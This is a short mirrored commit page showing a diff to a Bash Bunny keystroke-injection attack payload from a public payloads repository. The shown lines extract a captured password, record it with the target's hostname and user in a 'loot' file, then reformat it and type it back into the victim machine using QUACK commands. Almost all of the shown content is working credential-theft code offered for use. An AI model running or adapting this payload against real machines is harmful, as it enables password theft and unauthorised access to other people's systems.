mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
Update payload.txt
This commit is contained in:
parent
92f1be3a52
commit
072c659943
@ -33,7 +33,8 @@ LED G
|
||||
# Extract and Store the loot, then quack it
|
||||
pass=$(cat $password_process_file | grep "./" | cut -d "/" -f 2 | cut -d ":" -f 2)
|
||||
echo "Machine: $TARGET_HOSTNAME - User: $user - Pass: $pass" >> $password_loot_file
|
||||
echo "$pass" > $password_to_quack
|
||||
echo "STRING $pass" > $password_to_quack
|
||||
sync
|
||||
QUACK $password_to_quack
|
||||
QUACK ENTER
|
||||
rm $password_to_quack 2> /dev/null
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user